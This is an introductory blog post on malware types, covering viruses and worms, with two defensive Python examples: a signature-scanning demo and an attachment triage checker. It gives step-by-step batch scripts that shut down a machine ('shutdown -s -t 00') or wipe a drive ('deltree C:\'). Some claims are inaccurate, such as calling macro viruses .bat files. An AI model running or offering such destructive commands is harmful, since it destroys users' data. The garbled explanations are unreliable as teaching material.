Virus and worm
I welcome all my readers to this blog. Today we will talk
about a few important types of malware. This blog will be helpful for all
students who want to learn about cyber security, or who want to complete a
certification such as CompTIA Security+ or CEH.
Introduction:
Malware is software designed to damage a computer
(workstation, mobile, server or network). It can delete, modify or encrypt
data, change the settings of your computer or its registry, and spy on data
from the system.
Types of malware:
Virus and worms
Ransomware and crypto malware
Trojans and RATs
Rootkits
Keyloggers
Adware and Spyware
Bot and Botnets
We will now discuss each of them one by one. In this blog we will start with viruses and
worms, and I will try to cover the other malware types in my coming blogs. Now let's start with the virus.
Virus:
The name virus is borrowed from the medical field because a computer
virus behaves like a biological virus (it replicates itself). We just need to
run a program, and then the virus can replicate itself and spread through the file
system or the network. Sometimes a virus may not cause a problem, and sometimes it
can be a disaster. The first virus was detected on ARPANET (ARPANET was the network that became the basis for
the Internet, in 1970), and its name was Creeper.
These days viruses are very common: every day thousands of viruses
are created and spread around the globe.
Types of Virus:
Program Virus
Boot sector virus
Script virus
Macro virus
Encrypted virus
Polymorphic virus
1. Program Virus:
These are part of an application, an email
attachment, or storage media such as a CD or floppy disk, with the virus code hidden
inside. It is like a Trojan: when we run the application, open the
attachment or play the storage media, its code works in the background.
2. Boot sector virus:
These are viruses designed to affect the boot
sector / master boot record (MBR) or external storage media such as a CD or floppy disk.
3. Script Virus:
These are web-based viruses, which attack a
computer with the help of a website. Sometimes a malicious website is designed
to attack a system by running a script. For example, when
we download a file from a website or play a video on a website, a
script can run in the background, which can be very harmful.
4. Macro virus:
These are viruses that can be executed from
executable files; the best example is a Microsoft Office Word file. Notepad files
can also be used for this purpose. Such a virus is spread by email as an
attachment. These are the .bat files that execute their code when we click on them. We
should always check the file extension before executing a file.
5. Encrypted virus:
The attacker sends the virus code in encrypted
form so that it cannot be easily detected. In most cases it carries the decryption algorithm
as well, so that when it reaches the
target, the decryption code decrypts
the virus code for execution.
6. Polymorphic Virus:
Polymorphic means "occurring in several
different forms, in particular with reference to species or genetic variation".
We studied it in biology and chemistry in our school days; the best example
in biology is the phenotype. Now it is time to look at polymorphism in computer
science.
Traditional antivirus
works on a signature basis, so the attacker uses polymorphic properties in the code:
if antivirus detects its signature, the virus changes its signature on the next installation
so that antivirus does not detect it.
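The limit of signature matching described in the Encrypted virus and Polymorphic Virus sections above, as an added example that is not part of the original blog: a whole-file hash misses a copy encrypted with a new key, a byte pattern on the constant decryption routine still matches it, and both miss a copy whose routine has also changed. STUB, STUB_VARIANT, BODY and all function names are constructed placeholders made of inert ASCII text.

```python
import hashlib

# Constructed, inert stand-ins: plain ASCII markers, no real malware bytes.
STUB = b"[constructed-decryptor-stub]"          # constant decryption routine
STUB_VARIANT = b"[constructed-stub-variant-2]"  # rewritten routine (polymorphic case)
BODY = b"constructed inert body, not real code"


def sample(stub: bytes, key: int) -> bytes:
    """Build a test fixture laid out as stub + key byte + XOR-encoded body."""
    return stub + bytes([key]) + bytes(b ^ key for b in BODY)


def hash_match(data: bytes, known_hashes: set[str]) -> bool:
    """Whole-file signature: matches only byte-identical copies."""
    return hashlib.sha256(data).hexdigest() in known_hashes


def pattern_match(data: bytes, patterns: list[bytes]) -> bool:
    """Byte-pattern signature: matches any file containing a known sequence."""
    return any(p in data for p in patterns)


def scan_report() -> dict[str, tuple[bool, bool]]:
    """Return (hash_match, pattern_match) for three constructed fixtures."""
    first_seen = sample(STUB, 0x21)
    known_hashes = {hashlib.sha256(first_seen).hexdigest()}
    patterns = [STUB]
    fixtures = {
        "first_seen": first_seen,
        "encrypted_new_key": sample(STUB, 0x5A),    # same stub, new key
        "polymorphic": sample(STUB_VARIANT, 0x5A),  # stub changed as well
    }
    return {name: (hash_match(data, known_hashes), pattern_match(data, patterns))
            for name, data in fixtures.items()}


if __name__ == "__main__":
    for name, result in scan_report().items():
        print(f"{name:18} hash={result[0]!s:5} pattern={result[1]}")
```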
I have explained the types of virus. Apart from these, we can
also categorize viruses as Armored
Virus, Multipartite Virus, Tunneling Virus and Stealth Virus, but these categories are based on the different techniques
used by the virus, and I do not think I need to explain them in detail here.
Now we will take an
example of how an attacker can write a program to create a virus and how the attacker can spread it.
I request my readers not to apply this technique on anyone because it is
illegal; I am writing this blog for educational purposes only.
The best example is a program with the .bat file extension;
an attacker can spread these files as an email attachment.
Below are the steps:
1. Open a Notepad file.
2. Write the code below.
@echo off
shutdown -s -t 00
3. Save the file with the .bat extension.
4. Run it by double-clicking it.
The command "shutdown -s -t 00" shuts down the computer each
time it starts, so the user can never start the computer normally, and it may
cause data loss.
Another example is:
@echo off
deltree C:\
It will delete files permanently from the hard disk.
How can we protect our computer from virus attacks?
The best way is to use antivirus with the latest virus
definitions; the antivirus contains signatures of all the detected viruses and
protects your machine from them.
- Use a firewall
- Use authenticated websites
- Always download files, videos or other documents from a good source
- Use email carefully and do not open attachments from unknown emails
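The advice above to check the file extension and to be careful with attachments, as an added example that is not part of the original blog: a triage function that flags attachment names by their real (last) extension and looks inside batch files for the two commands this page uses. The extension sets are illustrative rather than complete, and the function name and sample attachments are constructed for this example.

```python
import os
import re

# Illustrative, not exhaustive (assumption): extensions Windows runs on double-click.
RUNS_ON_CLICK = {".bat", ".cmd", ".exe", ".com", ".scr", ".vbs", ".js"}
# Macro-enabled Office formats (assumption: treated as risky in email).
MACRO_ENABLED = {".docm", ".xlsm", ".pptm"}
# The two commands from this page's batch examples, at the start of a line.
DESTRUCTIVE = re.compile(r"^[ \t]*@?(shutdown|deltree)\b",
                         re.IGNORECASE | re.MULTILINE)


def triage(filename: str, content: str = "") -> list[str]:
    """Return the reasons an attachment deserves a closer look (empty if none)."""
    findings = []
    # Only the last extension decides how Windows opens the file.
    stem, ext = os.path.splitext(filename.strip().lower())
    if ext in RUNS_ON_CLICK:
        findings.append(f"runs on double-click: {ext}")
        shown = os.path.splitext(stem)[1]
        if shown and shown not in RUNS_ON_CLICK:
            findings.append(f"double extension: looks like {shown}, runs as {ext}")
    elif ext in MACRO_ENABLED:
        findings.append(f"macro-enabled document: {ext}")
    if ext in {".bat", ".cmd"}:
        for match in DESTRUCTIVE.finditer(content):
            findings.append(f"destructive command: {match.group(1).lower()}")
    return findings


if __name__ == "__main__":
    # Constructed attachment names and contents.
    samples = [
        ("invoice.pdf.bat", "@echo off\nshutdown -s -t 00\n"),
        ("cleanup.BAT", "@echo off\r\ndeltree C:\\\r\n"),
        ("report.docm", ""),
        ("notes.txt", ""),
    ]
    for name, body in samples:
        print(name, "->", triage(name, body) or "no findings")
```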
If you want to know more about how to protect your machine
please read my blog:
Worm: A computer
worm is self-replicating malware that duplicates itself to spread to uninfected
computers. It can move from one system to another, or from one network to another,
without human intervention. It uses the network for transmission, and that is why
it spreads quickly.
How can we protect our computer from worms?
We can use a firewall to protect our network from worms; apart
from this, we can use antivirus with the latest signature updates.
The main differences between a virus and a worm

| Virus | Worm |
|---|---|
| It needs human intervention | It does not need human intervention |
| A virus is slower than a worm | It takes effect faster than a virus |
| Antivirus plays a very important role in protecting our environment from viruses | Antivirus and firewall play an important role in protecting from worms |
| The main impact of a virus is that it deletes or corrupts files | The main purpose of a worm is to slow down the network or system |
Thanks for sharing this information. Very well articulated and can help even in technical people to understand the basic concepts.
**Non-technical
Useful information